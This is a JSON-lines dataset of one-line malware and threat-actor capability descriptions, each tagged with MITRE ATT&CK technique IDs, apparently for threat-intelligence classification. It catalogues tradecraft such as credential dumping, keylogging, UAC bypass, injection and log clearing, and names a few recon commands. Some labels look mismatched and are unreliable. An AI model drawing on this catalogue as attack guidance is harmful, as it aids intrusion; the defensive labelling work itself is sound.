{"text1":"can execute commands with script as well as execute JavaScript.","labels":"['T1064']"}
{"text1":"can execute ipconfig on the victim\u2019s machine.","labels":"['T1016']"}
{"text1":"can execute PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"can execute shell commands using cmd.exe.","labels":"['T1059']"}
{"text1":"can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.","labels":"['T1048']"}
{"text1":"can exploit vulnerabilities such as MS14-058.","labels":"['T1068']"}
{"text1":"can extract cached password hashes from a system\u2019s registry.","labels":"['T1003']"}
{"text1":"can function as a proxy to create a serve that relays communication between the client and C&C server.","labels":"['T1090']"}
{"text1":"can gather a list of processes.","labels":"['T1057']"}
{"text1":"can gather a process list from the victim.","labels":"['T1057']"}
{"text1":"can gather browser usernames and passwords.","labels":"['T1003']"}
{"text1":"can gather information about TCP connection state.","labels":"['T1049']"}
{"text1":"can gather information about the host.","labels":"['T1082']"}
{"text1":"can gather information on the mapped drives, OS version, computer name, and memory size.","labels":"['T1082']"}
{"text1":"can gather information on the victim username.","labels":"['T1033']"}
{"text1":"can gather network share information.","labels":"['T1135']"}
{"text1":"can gather Registry values.","labels":"['T1012']"}
{"text1":"can gather system information, the computer name, OS version, drive and serial information from the victim's machine.","labels":"['T1082']"}
{"text1":"can gather the disk volume information.","labels":"['T1082']"}
{"text1":"can gather the IP address from the victim's machine.","labels":"['T1016']"}
{"text1":"can gather the victim computer name and serial number.","labels":"['T1082']"}
{"text1":"can gather the victim user name.","labels":"['T1033']"}
{"text1":"can gather victim drive information.","labels":"['T1083']"}
{"text1":"can gather victim proxy information.","labels":"['T1016']"}
{"text1":"can get a list of the processes and running tasks on the system.","labels":"['T1057']"}
{"text1":"can identify logged in users across the domain and views user sessions.","labels":"['T1033']"}
{"text1":"can identify system information, including battery status.","labels":"['T1082']"}
{"text1":"can inject a malicious DLL into a process.","labels":"['T1055']"}
{"text1":"can inject a variety of payloads into processes dynamically chosen by the adversary.","labels":"['T1055']"}
{"text1":"can install a new service.","labels":"['T1543.003']"}
{"text1":"can install encrypted configuration data under the Registry key HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellCompatibility\\Applications\\laxhost.dll and HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PrintConfigs.","labels":"['T1112']"}
{"text1":"can install itself as a new service.","labels":"['T1543.003']"}
{"text1":"can interact with a victim\u2019s Outlook session and look through folders and emails.","labels":"['T1114']"}
{"text1":"can launch a remote shell to execute commands.","labels":"['T1059']"}
{"text1":"can launch cmd.exe to execute commands on the system.","labels":"['T1059']"}
{"text1":"can list all files on a system.","labels":"['T1083']"}
{"text1":"can list connected devices.","labels":"['T1120']"}
{"text1":"can list directories on a victim.","labels":"['T1083']"}
{"text1":"can list files and directories.","labels":"['T1083']"}
{"text1":"can list local and remote shared drives and folders over SMB.","labels":"['T1135']"}
{"text1":"can list running services.","labels":"['T1007']"}
{"text1":"can lists information about files in a directory.","labels":"['T1083']"}
{"text1":"can list the running processes and get the process ID and parent process\u2019s ID.","labels":"['T1057']"}
{"text1":"can load a DLL using .","labels":"['T1218.011']"}
{"text1":"can load a DLL using the LoadLibrary API.","labels":"['T1129']"}
{"text1":"can log keystrokes.","labels":"['T1056']"}
{"text1":"can manipulate Registry keys.","labels":"['T1112']"}
{"text1":"can migrate into another process using reflective DLL injection.","labels":"['T1055']"}
{"text1":"can modify file or directory timestamps.","labels":"['T1070.006']"}
{"text1":"can modify service configurations.","labels":"['T1543.003']"}
{"text1":"can obtain a list of active connections and open ports.","labels":"['T1049']"}
{"text1":"can obtain a list of running processes on the victim\u2019s machine.","labels":"['T1057']"}
{"text1":"can obtain a list of SIDs and provide the option for selecting process tokens to impersonate.","labels":"['T1134']"}
{"text1":"can obtain a list of smart card readers attached to the victim.","labels":"['T1120']"}
{"text1":"can obtain a process list from the victim.","labels":"['T1057']"}
{"text1":"can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.","labels":"['T1016']"}
{"text1":"can obtain information about process integrity levels.","labels":"['T1057']"}
{"text1":"can obtain information about running processes on the victim.","labels":"['T1057']"}
{"text1":"can obtain information about security software on the victim.","labels":"['T1518.001']"}
{"text1":"can obtain information about the current user.","labels":"['T1033']"}
{"text1":"can obtain information about the logged on user both locally and for Remote Desktop sessions.","labels":"['T1033']"}
{"text1":"can obtain information about the victim's IP address.","labels":"['T1016']"}
{"text1":"can obtain information on installed anti-malware programs.","labels":"['T1518.001']"}
{"text1":"can obtain network information, including DNS, IP, and proxies.","labels":"['T1016']"}
{"text1":"can obtain passwords from common browsers and FTP clients.","labels":"['T1003', 'T1552.001']"}
{"text1":"can obtain running services on the victim.","labels":"['T1007']"}
{"text1":"can obtain screenshots from the victim.","labels":"['T1113']"}
{"text1":"can obtain the computer name, OS version, and default language identifier.","labels":"['T1082']"}
{"text1":"can obtain the date and time of a system.","labels":"['T1124']"}
{"text1":"can obtain the victim user name.","labels":"['T1033', 'T1069']"}
{"text1":"can open an interactive command-shell to perform command line functions on victim machines.","labels":"['T1059']"}
{"text1":"can open the Windows Firewall on the victim\u2019s machine to allow incoming connections.","labels":"['T1562.001']"}
{"text1":"can overwrite Registry settings to reduce its visibility on the victim.","labels":"['T1070']"}
{"text1":"can perform DLL injection.","labels":"['T1055']"}
{"text1":"can perform DLL loading.","labels":"['T1055']"}
{"text1":"can perform keylogging.","labels":"['T1056']"}
{"text1":"can perform pass the hash.","labels":"['T1550.002']"}
{"text1":"can perform process injection by using a reflective DLL.","labels":"['T1055']"}
{"text1":"can perform screen captures of the victim\u2019s machine.","labels":"['T1113']"}
{"text1":"can provide a remote shell.","labels":"['T1059']"}
{"text1":"can query for information contained within the Windows Registry.","labels":"['T1012']"}
{"text1":"can query service configuration information.","labels":"['T1007']"}
{"text1":"can receive and execute commands with cmd.exe. It can also provide a reverse shell.","labels":"['T1059']"}
{"text1":"can record audio using any existing hardware recording devices.","labels":"['T1123']"}
{"text1":"can record keystrokes from both the keyboard and virtual keyboard.","labels":"['T1056']"}
{"text1":"can record sound using input audio devices.","labels":"['T1123']"}
{"text1":"can record the sounds from microphones on a computer.","labels":"['T1123']"}
{"text1":"can recover hashed passwords.","labels":"['T1003']"}
{"text1":"can remotely activate the victim\u2019s webcam to capture content.","labels":"['T1125']"}
{"text1":"can retrieve and execute additional  payloads from the C2 server.","labels":"['T1105']"}
{"text1":"can retrieve information about the Windows domain.","labels":"['T1016']"}
{"text1":"can retrieve IP and network adapter configuration information from compromised hosts.","labels":"['T1016']"}
{"text1":"can retrieve OS name\/architecture and computer\/domain name information from compromised hosts.","labels":"['T1082']"}
{"text1":"can retrieve the current content of the user clipboard.","labels":"['T1115']"}
{"text1":"can retrieve usernames from compromised hosts.","labels":"['T1087']"}
{"text1":"can run a command on another machine using .","labels":"['T1569.002']"}
{"text1":"can run a copy of cmd.exe.","labels":"['T1059']"}
{"text1":"can run  to gather information about the victim.","labels":"['T1082']"}
{"text1":"can scan for open TCP ports on the target network.","labels":"['T1046']"}
{"text1":"can scan local network for open SMB.","labels":"['T1135']"}
{"text1":"can scan victim drives to look for specific banking software on the machine to determine next actions. It also looks at browsing history and open tabs for specific strings.","labels":"['T1083']"}
{"text1":"can search directories for files on the victim\u2019s machine.","labels":"['T1083']"}
{"text1":"can set its \"beacon\" payload to reach out to the C2 server on an arbitrary and random interval. In addition it will break large data sets into smaller chunks for exfiltration.","labels":"['T1029']"}
{"text1":"can sleep for a specific time and be set to communicate at specific intervals.","labels":"['T1029']"}
{"text1":"can sniff plaintext network credentials and use NBNS Spoofing to poison name services.","labels":"['T1557.001']"}
{"text1":"can spawn remote shells.","labels":"['T1059']"}
{"text1":"can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.","labels":"['T1021.001']"}
{"text1":"can start SOCKS proxy threads.","labels":"['T1090']"}
{"text1":"can steal access tokens from exiting processes and make tokens from known credentials.","labels":"['T1134']"}
{"text1":"can steal clipboard contents.","labels":"['T1115']"}
{"text1":"can switch to a new C2 channel if the current one is broken.","labels":"['T1008']"}
{"text1":"can take a desktop screenshot and save the file into \\ProgramData\\Mail\\MailAg\\shot.png.","labels":"['T1113']"}
{"text1":"can take regular screenshots when certain applications are open that are sent to the command and control server.","labels":"['T1113']"}
{"text1":"can take screenshots.","labels":"['T1113']"}
{"text1":"can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files.","labels":"['T1113']"}
{"text1":"can terminate a specific process by its process id.","labels":"['T1543.003']"}
{"text1":"can timestomp files on victims using a Web shell.","labels":"['T1070.006']"}
{"text1":"can track key presses with a keylogger module.","labels":"['T1056']"}
{"text1":"can uninstall malware components using a batch script. Additionally, a malicious Word document used for delivery uses VBA macros for execution.","labels":"['T1064']"}
{"text1":"can upload, download, and execute files on the victim.","labels":"['T1105']"}
{"text1":"can upload and download files.","labels":"['T1105']"}
{"text1":"can upload and download files to the victim.","labels":"['T1105']"}
{"text1":"can upload and download to\/from a victim machine.","labels":"['T1105']"}
{"text1":"can upload files from compromised hosts.","labels":"['T1005']"}
{"text1":"can upload files to the victim's machine for operations.","labels":"['T1105']"}
{"text1":"can upload files to the victim\u2019s machine and can download additional payloads.","labels":"['T1105']"}
{"text1":"can use a number of known techniques to bypass Windows UAC.","labels":"['T1548.002']"}
{"text1":"can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.","labels":"['T1021.003']"}
{"text1":"can use DDE to execute additional payloads on compromised hosts.","labels":"['T1559.002']"}
{"text1":"can use HTTP and DNS for C2 communications.","labels":"['T1071']"}
{"text1":"can use HTTP for C2.","labels":"['T1071']"}
{"text1":"can use HTTP or DNS for C2.","labels":"['T1071']"}
{"text1":"can use HTTP or HTTPS for command and control to hard-coded C2 servers.","labels":"['T1071']"}
{"text1":"can use HTTP or SMTP for C2.","labels":"['T1071']"}
{"text1":"can use known credentials to run commands and spawn processes as another user.","labels":"['T1078']"}
{"text1":"can use MS10-061 to exploit a print spooler vulnerability in a remote system with a shared printer in order to move laterally.","labels":"['T1210']"}
{"text1":"can use Mshta.exe to execute additional payloads on compromised hosts.","labels":"['T1218.005']"}
{"text1":"can use MSHTA to serve additional payloads.","labels":"['T1218.005']"}
{"text1":"can use Obfs3, a pluggable transport, to add another layer of encryption and obfuscate TLS.","labels":"['T1573']"}
{"text1":"can use port 995 for C2.","labels":"['T1571']"}
{"text1":"can use PowerSploit or other scripting frameworks to perform execution.","labels":"['T1064']"}
{"text1":"can use process hollowing for execution.","labels":"['T1055.012']"}
{"text1":"can user PowerView to perform \u201cnet user\u201d commands and create local system and domain accounts.","labels":"['T1136']"}
{"text1":"can use Rundll32 to execute additional payloads.","labels":"['T1218.011']"}
{"text1":"can use SSL and TLS for communications.","labels":"['T1573']"}
{"text1":"can use tasklist to collect a list of running tasks.","labels":"['T1057']"}
{"text1":"can use the command-line utility cacls.exe to change file permissions.","labels":"['T1059', 'T1222']"}
{"text1":"can use the Windows API function CreateProcess to execute another process.","labels":"['T1106']"}
{"text1":"can use Window admin shares (C$ and ADMIN$) for lateral movement.","labels":"['T1021.002']"}
{"text1":"can use Windows Authentication Packages for persistence.","labels":"['T1547.002']"}
{"text1":"can use WinRM to execute a payload on a remote host.","labels":"['T1021.006']"}
{"text1":"can use WMI queries to gather system information.","labels":"['T1047']"}
{"text1":"can use WMI queries to retrieve data from compromised hosts.","labels":"['T1047']"}
{"text1":"can use WMI to execute commands.","labels":"['T1047']"}
{"text1":"can wipe drives using  Remove-Item commands.","labels":"['T1070.004']"}
{"text1":"can write and execute PowerShell scripts.","labels":"['T1059.001']"}
{"text1":"captured screenshots and desktop video recordings.","labels":"['T1113']"}
{"text1":"captured screenshots and sent them out to a C2 server.","labels":"['T1113']"}
{"text1":"captures and DES-encrypts credentials before writing the username and password to a log file, C:\\log.txt.","labels":"['T1056']"}
{"text1":"captures hashes and credentials that are sent to the system after the name services have been poisoned.","labels":"['T1040']"}
{"text1":"captures keystrokes and sends them back to the C2 server.","labels":"['T1056']"}
{"text1":"captures screenshots based on specific keywords in the window\u2019s title.","labels":"['T1113']"}
{"text1":"captures screenshots of the infected system.","labels":"['T1113']"}
{"text1":"captures screenshots of the victim\u2019s screen.","labels":"['T1113']"}
{"text1":"captures the content of the desktop with the screencapture binary.","labels":"['T1113']"}
{"text1":"checks for anti-virus, forensics, and virtualization software.","labels":"['T1518.001']"}
{"text1":"checks for new hard drives on the victim, such as USB devices, by listening for the WM_DEVICECHANGE window message.","labels":"['T1120']"}
{"text1":"checks for processes associated with anti-virus vendors.","labels":"['T1518.001']"}
{"text1":"checks for sandboxing libraries and debugging tools.","labels":"['T1518.001']"}
{"text1":"checks for the existence of anti-virus.","labels":"['T1518.001']"}
{"text1":"checks for the presence of Bitdefender security software.","labels":"['T1518.001']"}
{"text1":"checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created.","labels":"['T1012']"}
{"text1":"checks if the victim OS is 32 or 64-bit.","labels":"['T1082']"}
{"text1":"checks its parent process for indications that it is running in a sandbox setup.","labels":"['T1057']"}
{"text1":"checks the Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings for proxy configurations information.","labels":"['T1012']"}
{"text1":"checks the running processes for evidence it may be running in a sandbox environment. It specifically enumerates processes for Wireshark and Sysinternals.","labels":"['T1057']"}
{"text1":"cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.","labels":"['T1070']"}
{"text1":"clears event logs.","labels":"['T1070']"}
{"text1":"clears the system event logs.","labels":"['T1070']"}
{"text1":"code may be obfuscated through structured exception handling and return-oriented programming.","labels":"['T1027']"}
{"text1":"collected complete contents of the 'Pictures' folder from compromised Windows systems.","labels":"['T1005']"}
{"text1":"collected data from local victim systems.","labels":"['T1005']"}
{"text1":"collected file listings of all default Windows directories.","labels":"['T1083']"}
{"text1":"collected system architecture information.  used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim\u2019s machine.","labels":"['T1082']"}
{"text1":"collected the victim computer name, OS version, and architecture type and sent the information to its C2 server.  also enumerated all available drives on the victim's machine.","labels":"['T1082']"}
{"text1":"collected the victim username and whether it was running as admin, then sent the information to its C2 server.","labels":"['T1033']"}
{"text1":"collects, compresses, encrypts, and exfiltrates data to the C2 server every 10 minutes.","labels":"['T1029']"}
{"text1":"collects a list of active and listening connections by using the command netstat -nao as well as a list of available network mappings with net use.","labels":"['T1049']"}
{"text1":"collects a list of files and directories in C:\\ with the command dir \/s \/a c:\\ >> \"C:\\windows\\TEMP\\[RANDOM].tmp\".","labels":"['T1083']"}
{"text1":"collects a list of install programs and services on the system\u2019s machine.","labels":"['T1007']"}
{"text1":"collects a list of network shares with the command net share.","labels":"['T1135']"}
{"text1":"collects a list of running services with the command tasklist \/svc.","labels":"['T1007']"}
{"text1":"collects a unique identifier (UID) from a compromised host.","labels":"['T1082']"}
{"text1":"collects data from the clipboard.","labels":"['T1115']"}
{"text1":"collects data from the local victim system.","labels":"['T1005']"}
{"text1":"collects data stored in the clipboard.","labels":"['T1115']"}
{"text1":"collects endpoint information using the systeminfo command.","labels":"['T1082']"}
{"text1":"collects files with the following extensions: .ppt, .pptx, .pdf, .doc, .docx, .xls, .xlsx, .docm, .rtf, .inp, .xlsm, .csv, .odt, .pps, .vcf and sends them back to the C2 server.","labels":"['T1005']"}
{"text1":"collects general system enumeration data about the infected machine and checks the OS version.","labels":"['T1082']"}
{"text1":"collects hard drive content and system configuration information.","labels":"['T1082']"}
{"text1":"collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.","labels":"['T1083']"}
{"text1":"collects information about running processes.","labels":"['T1057']"}
{"text1":"collects information about running processes from victims.","labels":"['T1057']"}
{"text1":"collects information about the OS and computer name.","labels":"['T1082']"}
{"text1":"collects information from the victim, including installed drivers, programs previously executed by users, programs and services configured to automatically run at startup, files and folders present in any user's home folder, files and folders present in any user's My Documents, programs installed to the Program Files folder, and recently accessed files, folders, and programs.","labels":"['T1083']"}
{"text1":"collects information on network settings and Internet proxy settings from the victim.","labels":"['T1016']"}
{"text1":"collects information on running processes and environment variables from the victim.","labels":"['T1057']"}
{"text1":"collects its process identifier (PID) on the victim.","labels":"['T1057']"}
{"text1":"collects Keychain storage data and copies those passwords\/tokens to a file.","labels":"['T1555.001']"}
{"text1":"collects keystrokes from the victim machine.","labels":"['T1056']"}
{"text1":"collects keystrokes from the victim\u2019s machine.","labels":"['T1056']"}
{"text1":"collects local files and information from the victim\u2019s local machine.","labels":"['T1005']"}
{"text1":"collects MAC address and local IP address information from the victim.","labels":"['T1016']"}
{"text1":"collects network adapter and interface information by using the commands ipconfig \/all, arp -a and route print. It also collects the system's MAC address with getmac and domain configuration with net config workstation.","labels":"['T1016']"}
{"text1":"collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands systeminfo, net config workstation, hostname, ver, set, and date \/t.","labels":"['T1082']"}
{"text1":"collects password policy information with the command net accounts.","labels":"['T1201']"}
{"text1":"collects system information from the victim, including CPU speed, computer name, volume serial number, ANSI code page, OEM code page identifier for the OS, Microsoft Windows version, and memory information.","labels":"['T1082']"}
{"text1":"collects the account name of the logged-in user and sends it to the C2.","labels":"['T1033']"}
{"text1":"collects the computer name, OS versioning information, and OS install date and sends the information to the C2.","labels":"['T1082']"}
{"text1":"collects the computer name, the BIOS model, and execution path.","labels":"['T1082']"}
{"text1":"collects the computer name and host name on the compromised system.","labels":"['T1082']"}
{"text1":"collects the computer name and serial number for the storage volume C:\\.","labels":"['T1082']"}
{"text1":"collects the current username and sends it to the C2 server.","labels":"['T1033']"}
{"text1":"collects the current username from the victim.","labels":"['T1033']"}
{"text1":"collects the domain name from a compromised host.","labels":"['T1016']"}
{"text1":"collects the endpoint victim's username and uses it as a basis for downloading additional components from the C2 server.","labels":"['T1033']"}
{"text1":"collects the group name of the logged-in user and sends it to the C2.","labels":"['T1069']"}
{"text1":"collects the hostname of the victim machine.","labels":"['T1082']"}
{"text1":"collects the keychains on the system.","labels":"['T1555.001']"}
{"text1":"collects the local IP address of the victim and sends it to the C2.","labels":"['T1016']"}
{"text1":"collects the MAC address, computer name, and CPU information.","labels":"['T1082']"}
{"text1":"collects the network adapter\u2019s IP and MAC address as well as IP addresses of the network adapter\u2019s default gateway, primary\/secondary WINS, DHCP, and DNS servers, and saves them into a log file.","labels":"['T1016']"}
{"text1":"collects the OS name, machine name, and architecture information.","labels":"['T1082']"}
{"text1":"collects the OS version, country name, MAC address, computer name, physical memory statistics, and volume information for all drives on the system.","labels":"['T1082']"}
{"text1":"collects the OS version and computer name.","labels":"['T1082']"}
{"text1":"collects the system information, including hostname and OS version, and sends it to the C2 server.","labels":"['T1082']"}
{"text1":"collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.","labels":"['T1082']"}
{"text1":"collects the username from the victim\u2019s machine.","labels":"['T1033']"}
{"text1":"collects the users of the system.","labels":"['T1087']"}
{"text1":"collects the victim's IP address.","labels":"['T1016']"}
{"text1":"collects the victim's username.","labels":"['T1033']"}
{"text1":"collects the victim IP address, MAC address, as well as the victim account domain name.","labels":"['T1016']"}
{"text1":"collects the victim LAN IP address and sends it to the C2 server.","labels":"['T1016']"}
{"text1":"collects the victim\u2019s computer name, processor architecture, OS version, and volume serial number.","labels":"['T1082']"}
{"text1":"collects the victim\u2019s username and whether that user is an admin.","labels":"['T1033']"}
{"text1":"collects the volumes mapped on the system, and also steals files with the following extensions: .docx, .doc, .pptx, .ppt, .xlsx, .xls, .rtf, and .pdf.","labels":"['T1083']"}
{"text1":"collects user files from the compromised host based on predefined file extensions.","labels":"['T1005']"}
{"text1":"collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).","labels":"['T1047']"}
{"text1":"command and control occurs via HTTPS over port 443.","labels":"['T1043', 'T1071']"}
{"text1":"Commands such as net group and net localgroup can be used in  to gather information about and manipulate groups.","labels":"['T1069']"}
{"text1":"Commands such as net view can be used in  to gather information about available remote systems.","labels":"['T1018']"}
{"text1":"Commands under net user can be used in  to gather information about and manipulate user accounts.","labels":"['T1087']"}
{"text1":"commonly created Web shells on victims' publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.","labels":"['T1505.003']"}
{"text1":"communicates over common ports such as TCP 80, 443, and 25.","labels":"['T1043']"}
{"text1":"communicates over HTTP for C2.","labels":"['T1071']"}
{"text1":"communicates over HTTP or HTTPS for C2.","labels":"['T1071']"}
{"text1":"communicates over ports 80, 443, 53, and 8080 via raw sockets instead of the protocols usually associated with the ports.","labels":"['T1043']"}
{"text1":"communicates to its C2 server over HTTP.","labels":"['T1071']"}
{"text1":"communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header.","labels":"['T1071']"}
{"text1":"communicates to the C2 server by retrieving a Google Doc.","labels":"['T1102']"}
{"text1":"communicates using HTTPS and uses a custom encryption cipher to encrypt the HTTPS message body.","labels":"['T1573']"}
{"text1":"communicates via DNS for C2.","labels":"['T1071']"}
{"text1":"communicates via ICMP for C2.","labels":"['T1095']"}
{"text1":"communicates with its C2 server over HTTP.","labels":"['T1071']"}
{"text1":"communicates with its C2 server over HTTPS.","labels":"['T1071']"}
{"text1":"communicates with its C2 server over TCP port 3728.","labels":"['T1571']"}
{"text1":"communicates with its C2 servers over HTTP.","labels":"['T1071']"}
{"text1":"communicates with its C2 servers through a TCP socket.","labels":"['T1095']"}
{"text1":"completes network communication via raw sockets.","labels":"['T1095']"}
{"text1":"compressed data with zlib prior to sending it over C2.","labels":"['T1560']"}
{"text1":"compresses collected files with both the GZipStream class and a simple character replacement scheme before sending them to its C2 server.","labels":"['T1560']"}
{"text1":"compresses output data generated by command execution with a custom implementation of the Lempel\u2013Ziv\u2013Welch (LZW) algorithm.","labels":"['T1560']"}
{"text1":"compromised legitimate organizations' websites to create watering holes to compromise victims.","labels":"['T1189']"}
{"text1":"compromised McAfee ePO to move laterally by distributing malware as a software deployment task.","labels":"['T1072']"}
{"text1":"compromised three Japanese websites using a Flash exploit to perform watering hole attacks.","labels":"['T1189']"}
{"text1":"compromised user credentials and used valid accounts for operations.","labels":"['T1078']"}
{"text1":"concatenates then decompresses multiple resources to load an embedded .Net Framework assembly.","labels":"['T1140']"}
{"text1":"conducts brute force attacks against SSH services to gain initial access.","labels":"['T1110']"}
{"text1":"conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers.","labels":"['T1003']"}
{"text1":"configured its payload to inject into the rundll32.exe.","labels":"['T1218.011']"}
{"text1":"configures itself as a service.","labels":"['T1543.003']"}
{"text1":"connects over 443 for C2.","labels":"['T1043']"}
{"text1":"connects to a predefined domain on port 443 to exfil gathered information.","labels":"['T1048']"}
{"text1":"connects to C2 infrastructure and establishes backdoors over a custom communications protocol.","labels":"['T1095']"}
{"text1":"connects to external C2 infrastructure over the HTTP port.","labels":"['T1043']"}
{"text1":"connects to port 80 of a C2 server using Wininet API.","labels":"['T1071']"}
{"text1":"contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.","labels":"['T1053.005']"}
{"text1":"contains a cleanup module that removes traces of itself from the victim.","labels":"['T1070.004']"}
{"text1":"contains a collection of CodeExecution modules that enable by injecting code (DLL, shellcode) or reflectively loading a Windows PE file into a process.","labels":"['T1055']"}
{"text1":"contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.","labels":"['T1005']"}
{"text1":"contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences, Windows vault credential objects, or using .","labels":"['T1003']"}
{"text1":"contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.","labels":"['T1574.001']"}
{"text1":"contains a collection of Privesc-PowerUp modules that can discover and exploit various path interception opportunities in services, processes, and variables.","labels":"['T1034']"}
{"text1":"contains a collection of Privesc-PowerUp modules that can discover and replace\/modify service binaries, paths, and configs.","labels":"['T1543.003']"}
{"text1":"contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.","labels":"['T1012']"}
{"text1":"contains a command to collect and exfiltrate emails from Outlook.","labels":"['T1114']"}
{"text1":"contains a command to collect information about anti-virus software on the victim.","labels":"['T1518.001']"}
{"text1":"contains a command to collect the victim MAC address and LAN IP.","labels":"['T1016']"}
{"text1":"contains a command to collect the victim PC name and operating system.","labels":"['T1082']"}
{"text1":"contains a command to download and execute a file from a remotely hosted URL using WinINet HTTP requests.","labels":"['T1105']"}
{"text1":"contains a command to perform screen captures.","labels":"['T1113']"}
{"text1":"contains a command to retrieve files from its C2 server.","labels":"['T1105']"}
{"text1":"contains a copy of the OpenSSL library to encrypt C2 traffic.","labels":"['T1573']"}
{"text1":"contains a custom version of the RC4 algorithm that includes a programming error.","labels":"['T1573']"}
{"text1":"contains a keylogger component.","labels":"['T1056']"}
{"text1":"contains a keylogger module.","labels":"['T1056']"}
{"text1":"contains a keylogger module that collects keystrokes and the titles of foreground windows.","labels":"['T1056']"}
{"text1":"contains a module that captures screenshots of the victim's desktop.","labels":"['T1113']"}
{"text1":"contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.","labels":"['T1025']"}
{"text1":"contains a module to steal credentials from Web browsers on the victim machine.","labels":"['T1003']"}
{"text1":"contains base64-encoded strings.","labels":"['T1027']"}
{"text1":"contains code to clear event logs.","labels":"['T1070']"}
{"text1":"contains code to delete files from the victim\u2019s machine.","labels":"['T1070.004']"}
{"text1":"contains code to open and copy data from the clipboard.","labels":"['T1115']"}
{"text1":"contains commands to list files and directories, as well as search for files matching certain extensions from a defined list.","labels":"['T1083']"}
{"text1":"contains functionality to collect information from the clipboard.","labels":"['T1115']"}
{"text1":"contains junk code in its binary, likely to confuse malware analysts.","labels":"['T1027.001']"}
{"text1":"contains junk code in its functions in an effort to confuse disassembly programs.","labels":"['T1027.001']"}
{"text1":"contains keylogger functionality.","labels":"['T1056']"}
{"text1":"contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.","labels":"['T1056']"}
{"text1":"contains keylogging functionality to steal passwords.","labels":"['T1056']"}
{"text1":"contains many methods for bypassing Windows User Account Control on multiple versions of the operating system.","labels":"['T1548.002']"}
{"text1":"contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using autorun functionality.","labels":"['T1091']"}
{"text1":"contains screen capture functionality.","labels":"['T1113']"}
{"text1":"contains the execFile function to execute a specified file on the system using the NSTask:launch method.","labels":"['T1106']"}
{"text1":"contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.","labels":"['T1071']"}
{"text1":"contains the getFirefoxPassword function to attempt to locate Firefox passwords.","labels":"['T1552.001']"}
{"text1":"contains the getInfoOSX function to return the OS X version as well as the current user.","labels":"['T1033']"}
{"text1":"contains the getInstalledAPP function to run ls -la \/Applications to gather what applications are installed.","labels":"['T1082']"}
{"text1":"contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory.","labels":"['T1083']"}
{"text1":"contains the showBackupIosFolder function to check for IOS device backups by running ls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/.","labels":"['T1120']"}
{"text1":"contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.","labels":"['T1113']"}
{"text1":"contains UAC bypass code for both 32- and 64-bit systems.","labels":"['T1548.002']"}
{"text1":"contains unused machine instructions in a likely attempt to hinder analysis.","labels":"['T1027.001']"}
{"text1":"copied all targeted files to a directory called index that was eventually uploaded to the C&C server.","labels":"['T1074']"}
{"text1":"copied and installed tools for operations once in the victim environment.","labels":"['T1105']"}
{"text1":"copies a file over to the remote system before execution.","labels":"['T1105']"}
{"text1":"copies an executable payload to the target system by using  and then scheduling an unnamed task to execute the malware.","labels":"['T1053.005']"}
{"text1":"copies documents under 15MB found on the victim system to is the user's %temp%\\SMB\\ folder. It also copies files from USB devices to a predefined directory.","labels":"['T1074']"}
{"text1":"copies files from removable drives to C:\\system.","labels":"['T1074']"}
{"text1":"copies itself into the public folder of Network Attached Storage (NAS) devices and infects new victims who open the file.","labels":"['T1080']"}
{"text1":"copies itself to an .exe file with a filename that is likely intended to imitate Norton Antivirus but has several letters reversed (e.g. notron.exe).","labels":"['T1036']"}
{"text1":"copies itself to disk and creates an associated run key Registry entry to establish.","labels":"['T1547.001']"}
{"text1":"copies itself to the Startup folder to establish persistence.","labels":"['T1547.001']"}
{"text1":"copies staged data to removable drives when they are inserted into the system.","labels":"['T1052']"}
{"text1":"created accounts disguised as legitimate backup and service accounts as well as an email administration account.","labels":"['T1036']"}
{"text1":"created a custom video recording capability that could be used to monitor operations in the victim's environment.","labels":"['T1125']"}
{"text1":"created a directory named \"out\" in the user's %AppData% folder and copied files to it.","labels":"['T1074']"}
{"text1":"created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.","labels":"['T1547.001']"}
{"text1":"created a  that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.","labels":"['T1218.010']"}
{"text1":"created new Windows services and added them to the startup directories for persistence.","labels":"['T1543.003']"}
{"text1":"creates a backdoor by making a connection using a HTTP POST.","labels":"['T1071']"}
{"text1":"creates a backdoor through which remote attackers can adjust token privileges.","labels":"['T1134']"}
{"text1":"creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.","labels":"['T1029']"}
{"text1":"creates a backdoor through which remote attackers can create a service.","labels":"['T1543.003']"}
